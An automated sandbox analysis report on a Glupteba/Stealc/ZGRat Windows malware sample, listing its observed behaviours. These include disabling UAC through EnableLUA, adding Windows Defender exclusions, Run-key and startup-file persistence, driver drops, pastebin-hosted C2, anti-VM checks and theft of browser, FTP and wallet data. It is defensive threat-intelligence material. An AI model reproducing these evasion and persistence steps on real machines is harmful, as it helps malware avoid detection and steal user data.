Malware Analysis Report

2024-11-13 16:30

Sample ID 240510-kcrmfsga87
Target 5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe
SHA256 5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f
Tags
glupteba stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f

Threat Level: Known bad

The file 5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe was found to be: Known bad.

Malicious Activity Summary

glupteba stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer trojan upx

Windows security bypass

Glupteba payload

Glupteba

ZGRat

UAC bypass

Detect ZGRat V1

Stealc

Modifies boot configuration data using bcdedit

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Downloads MZ/PE file

Reads data files stored by FTP clients

Drops startup file

Executes dropped EXE

Loads dropped DLL

UPX packed file

Checks computer location settings

Reads user/profile data of web browsers

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Manipulates WinMonFS driver

Manipulates WinMon driver

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Program crash

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Uses Task Scheduler COM API

System policy modification

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 08:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 08:27

Reported

2024-05-10 08:30

Platform

win7-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wPtHZQ5vPdfaakL1wkqQ9xud.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\8ZqLGNH2YJDVFBCte8UAV3l8.exe = "0" C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\L668OyeExs0cF7hoU0qrfgo4.exe = "0" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\1zxDwRKfAb5DhSaC0THw4Vwu.exe = "0" C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A

ZGRat

rat zgrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CmJIWq2wc2BVSDGVagOVsd2b.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dGmP267yt3axoeXJ1O4oq2yr.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gH39aaHNd7QHbMZoFEbtbhje.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\weOd5vvE5X0n0UJO4Opa6iy0.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VoHJVuzNpYfgFk8sQ8PrQxJ2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bkWZHcXpRB7mEIZ3AR719Izc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sb0GbCygpb3KGmGgMkUH6TmP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\1zxDwRKfAb5DhSaC0THw4Vwu.exe = "0" C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\L668OyeExs0cF7hoU0qrfgo4.exe = "0" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wPtHZQ5vPdfaakL1wkqQ9xud.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\8ZqLGNH2YJDVFBCte8UAV3l8.exe = "0" C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMon driver

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2872 set thread context of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20240510082806.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u8k.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u8k.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u8k.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-492 = "India Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Windows\windefender.exe N/A
